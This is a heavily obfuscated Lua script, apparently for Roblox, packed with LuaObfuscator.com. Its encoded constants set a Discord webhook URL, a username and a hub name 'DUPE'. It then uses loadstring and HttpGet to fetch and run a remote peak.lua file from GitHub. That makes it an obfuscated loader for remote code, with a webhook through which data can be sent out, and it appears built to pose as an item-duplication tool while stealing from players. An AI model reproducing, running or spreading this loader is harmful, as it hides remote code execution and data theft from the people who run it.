--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=v2(v0(v30,16));if v19 then local v89=0;local v90;while true do if (v89==1) then return v90;end if (v89==0) then v90=v5(v82,v19);v19=nil;v89=1;end end else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-1)) + (620 -(555 + 64)))) ;return v83-(v83%(932 -((2494 -(1523 + 114)) + 74))) ;else local v84=568 -(367 + 181 + 20) ;local v85;while true do if (v84==(927 -(214 + 713))) then v85=2^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (877 -(282 + 595)) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 -0 ;local v36;local v37;while true do if (v35==(1066 -((1025 -(892 + 65)) + 997))) then return (v37 * (1526 -(226 + 1044))) + v36 ;end if (v35==0) then v36,v37=v1(v16,v18,v18 + (8 -6) );v18=v18 + (119 -(32 + (202 -117))) ;v35=1 + 0 ;end end end local function v23()local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(1 -0)) then return (v42 * (30800116 -14022900)) + (v41 * (65886 -(64 + 23 + 263))) + (v40 * 256) + v39 ;end if (v38==(180 -(67 + (1110 -(915 + 82))))) then v39,v40,v41,v42=v1(v16,v18,v18 + (7 -4) );v18=v18 + 3 + 1 ;v38=1 -0 ;end end end local function v24()local v43=v23();local v44=v23();local v45=2 -1 ;local v46=(v20(v44,(1081 -(1020 + 60)) + 0 ,26 -6 ) * ((432 -(44 + 153 + 233))^(1219 -(1069 + 118)))) + v43 ;local v47=v20(v44,(161 -114) -26 ,10 + 21 );local v48=((v20(v44,69 -37 )==(1 + 0)) and  -(1 -(1423 -(630 + 793)))) or (1 + 0) ;if (v47==(791 -(368 + 423))) then if (v46==(0 + 0)) then return v48 * (0 -(1913 -(1789 + 124))) ;else local v91=0 -0 ;while true do if (v91==(0 -0)) then v47=(785 -(745 + 21)) -(10 + 8) ;v45=0;break;end end end elseif (v47==(7874 -5827)) then return ((v46==0) and (v48 * ((443 -(416 + 26))/(0 -(0 + 0))))) or (v48 * NaN) ;end return v8(v48,v47-(440 + 583) ) * (v45 + (v46/((3 -(3 -2))^(92 -(189 -149))))) ;end local function v25(v49)local v50=0 -0 ;local v51;local v52;while true do if (v50==0) then v51=nil;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=(2 -1) + 0 ;end if (v50==((1820 -(1703 + 114)) + 0)) then return v6(v52);end if (v50==2) then v52={};for v92=1056 -(87 + 968) , #v51 do v52[v92]=v2(v1(v3(v51,v92,v92)));end v50=13 -10 ;end if (v50==((702 -(376 + 325)) + (0 -0))) then v51=v3(v16,v18,(v18 + v49) -(2 -1) );v18=v18 + v49 ;v50=1415 -((1375 -928) + 966) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=888 -(117 + 771) ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53~=(2 -1)) then else v56=nil;v57=nil;v53=1 + 1 ;end if (v53==(9 -7)) then v58=nil;v59=nil;v53=405 -(108 + 294) ;end if (0==v53) then v54=1489 -(570 + 919) ;v55=nil;v53=1;end if (v53==(4 -1)) then v60=nil;while true do if ((813 -(569 + 242))~=v54) then else local v98=0 -0 ;while true do if (v98==(1330 -(797 + 532))) then return v58;end if (v98==(0 + 0)) then for v108=1 + 0 ,v23() do local v109=0 + 0 ;local v110;local v111;local v112;while true do if (v109==(1203 -(373 + 829))) then v112=nil;while true do if (v110~=(1024 -(706 + 318))) then else v111=1251 -(721 + 530) ;v112=nil;v110=1272 -(945 + 326) ;end if (v110==1) then while true do if (v111~=(0 -0)) then else v112=v21();if (v20(v112,1 + 0 ,1)==(0 -0)) then local v183=0 + 0 ;local v184;local v185;local v186;local v187;local v188;while true do if (v183==(700 -(271 + 429))) then v184=0 + 0 ;v185=nil;v183=1501 -(1408 + 92) ;end if (v183==2) then v188=nil;while true do if (v184==(1086 -(461 + 625))) then local v189=0;local v190;while true do if ((238 -(64 + 174))~=v189) then else v190=0;while true do if (v190~=(0 + 0)) then else local v202=1288 -(993 + 295) ;while true do if (v202~=(0 + 0)) then else v185=1171 -(418 + 753) ;v186=nil;v202=1 + 0 ;end if (v202~=(1 + 0)) then else v190=1;break;end end end if (v190~=(1 + 0)) then else v184=1 + 0 ;break;end end break;end end end if (v184==1) then v187=nil;v188=nil;v184=2;end if (v184~=(1 + 1)) then else while true do if (v185==1) then local v191=1580 -(1183 + 397) ;local v192;local v193;while true do if (v191==(2 -1)) then while true do if (v192==(0 + 0)) then v193=0 + 0 ;while true do if ((1976 -(1913 + 62))==v193) then v185=2;break;end if (v193==0) then local v204=529 -(406 + 123) ;while true do if (v204==(1770 -(1749 + 20))) then v193=1 + 0 ;break;end if ((1933 -(565 + 1368))==v204) then v188={v22(),v22(),nil,nil};if (v186==(0 + 0)) then local v207=856 -(564 + 292) ;local v208;while true do if (v207==0) then v208=0 -0 ;while true do if (v208==0) then v188[3]=v22();v188[1904 -(106 + 1794) ]=v22();break;end end break;end end elseif (v186==1) then v188[8 -5 ]=v23();elseif (v186==(1 + 1)) then v188[307 -(244 + 60) ]=v23() -(2^(13 + 3)) ;elseif (v186==(1 + 2)) then local v217=0;while true do if (v217==(0 -0)) then v188[7 -4 ]=v23() -((116 -(4 + 110))^(600 -(57 + 527))) ;v188[1431 -(41 + 1386) ]=v22();break;end end end v204=1 + 0 ;end end end end break;end end break;end if (v191==(103 -(17 + 86))) then v192=0 + 0 ;v193=nil;v191=1;end end end if ((2 + 1)==v185) then if (v20(v187,3,6 -3 )==(2 -1)) then v188[170 -(122 + 44) ]=v60[v188[10 -6 ]];end v55[v108]=v188;break;end if (v185==(0 -0)) then local v195=0;local v196;local v197;while true do if (v195~=(0 -0)) then else v196=0 -0 ;v197=nil;v195=1 + 0 ;end if (v195==1) then while true do if (v196~=0) then else v197=0 -0 ;while true do if (v197==0) then local v205=0;while true do if (v205~=(0 -0)) then else v186=v20(v112,1 + 1 ,5 -2 );v187=v20(v112,69 -(30 + 35) ,6);v205=1;end if (v205~=(1 -0)) then else v197=1 + 0 ;break;end end end if (v197==(1258 -(1043 + 214))) then v185=1;break;end end break;end end break;end end end if (v185~=(7 -5)) then else local v198=1212 -(323 + 889) ;local v199;while true do if ((0 -0)==v198) then v199=0;while true do if (v199==(2 -1)) then v185=1230 -(322 + 905) ;break;end if (v199==(611 -(602 + 9))) then local v203=580 -(361 + 219) ;while true do if (v203==0) then local v206=320 -(53 + 267) ;while true do if (v206==(1189 -(449 + 740))) then if (v20(v187,1 + 0 ,1)==(948 -(245 + 702))) then v188[6 -4 ]=v60[v188[2]];end if (v20(v187,415 -(15 + 398) ,984 -(18 + 964) )==1) then v188[11 -8 ]=v60[v188[9 -6 ]];end v206=1;end if (v206==(1 + 0)) then v203=1;break;end end end if (v203~=1) then else v199=1 + 0 ;break;end end end end break;end end end end break;end end break;end if (v183==(1 + 0)) then v186=nil;v187=nil;v183=852 -(20 + 830) ;end end end break;end end break;end end break;end if (v109~=0) then else local v145=0;while true do if (0~=v145) then else v110=0 + 0 ;v111=nil;v145=127 -(116 + 10) ;end if ((1206 -(902 + 303))==v145) then v109=1;break;end end end end end for v113=1,v23() do v56[v113-(1 + 0) ]=v28();end v98=739 -(542 + 196) ;end end end if (v54==(0 + 0)) then local v99=0;while true do if (v99~=(1 -0)) then else v57={};v58={v55,v56,nil,v57};v99=2;end if (v99==0) then v55={};v56={};v99=2 -1 ;end if (v99~=(4 -2)) then else v54=1552 -(1126 + 425) ;break;end end end if (v54==(1 -0)) then v59=v23();v60={};for v101=766 -(468 + 297) ,v59 do local v102=405 -(118 + 287) ;local v103;local v104;local v105;while true do if ((0 -0)==v102) then v103=0;v104=nil;v102=1122 -(118 + 1003) ;end if (v102~=(3 -2)) then else v105=nil;while true do if (v103==(0 -0)) then local v146=377 -(142 + 235) ;while true do if (v146==(4 -3)) then v103=1 + 0 ;break;end if (v146~=0) then else local v182=977 -(553 + 424) ;while true do if (v182==(1 -0)) then v146=1;break;end if ((0 + 0)~=v182) then else v104=v21();v105=nil;v182=1 + 0 ;end end end end end if (v103==(1 + 0)) then if (v104==(1 + 0)) then v105=v21()~=0 ;elseif (v104==(1 + 1)) then v105=v24();elseif (v104==(2 + 1)) then v105=v25();end v60[v101]=v105;break;end end break;end end end v58[6 -3 ]=v21();v54=4 -2 ;end end break;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v86=0,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 ];else v77[v86]=v74[v86 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=5) then if (v80<=2) then if (v80<=0) then do return;end elseif (v80>1) then local v115=0;local v116;local v117;while true do if (v115==1) then v77[v116 + 1 ]=v117;v77[v116]=v117[v79[4]];break;end if (v115==0) then v116=v79[2];v117=v77[v79[3]];v115=1;end end else v77[v79[2]]=v63[v79[3]];end elseif (v80<=3) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80>4) then local v121=0;local v122;local v123;local v124;local v125;local v126;while true do if (v121==5) then v122=0;for v179=v126,v72 do v122=v122 + 1 ;v77[v179]=v123[v122];end v71=v71 + 1 ;v79=v67[v71];v126=v79[2];v121=6;end if (v121==7) then v79=v67[v71];v71=v79[3];break;end if (v121==3) then v77[v126 + 1 ]=v125;v77[v126]=v125[v79[4]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v121=4;end if (v121==4) then v71=v71 + 1 ;v79=v67[v71];v126=v79[2];v123,v124=v70(v77[v126](v13(v77,v126 + 1 ,v79[3])));v72=(v124 + v126) -1 ;v121=5;end if (v121==0) then v122=nil;v123,v124=nil;v125=nil;v126=nil;v77[v79[2]][v79[3]]=v79[4];v121=1;end if (v121==6) then v77[v126]=v77[v126](v13(v77,v126 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v121=7;end if (v121==1) then v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v121=2;end if (v121==2) then v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v126=v79[2];v125=v77[v79[3]];v121=3;end end else v77[v79[2]]=v79[3];end elseif (v80<=8) then if (v80<=6) then v77[v79[2]][v79[3]]=v79[4];elseif (v80>7) then local v129=0;local v130;while true do if (v129==0) then v130=v79[2];v77[v130]=v77[v130](v13(v77,v130 + 1 ,v72));break;end end else v77[v79[2]][v79[3]]=v79[4];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]][v79[3]]=v79[4];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v71=v79[3];end elseif (v80<=9) then v77[v79[2]]();elseif (v80>10) then v71=v79[3];else local v138=v79[2];local v139,v140=v70(v77[v138](v13(v77,v138 + 1 ,v79[3])));v72=(v140 + v138) -1 ;local v141=0;for v142=v138,v72 do v141=v141 + 1 ;v77[v142]=v139[v141];end end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0D3O00028O00026O00F03F03023O005F47030A3O00576562682O6F6B55726C03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F4O313338313638332O372O3837393533382F31765464705F34775A6A2D436D4955794B317557667641504F767A322D666842636C443167356C716C6F4A6248516F5A61576D6F68694F694943463938685864477A3945030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A61792O696F6365616E2O692F5065616B4F6E546F702F6D61696E2F7065616B2E6C756103083O00557365726E616D6503073O006A74726F78656E03073O004875624E616D6503043O004455504500163O0012043O00013O0026033O000D0001000200040B3O000D0001001201000100033O00300500010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000200046O00013O00024O00010001000100044O001500010026033O00010001000100040B3O00010001001201000100033O0030070001000A000B00122O000100033O00302O0001000C000D00124O00023O00044O000100016O00017O00",v9(),...);end
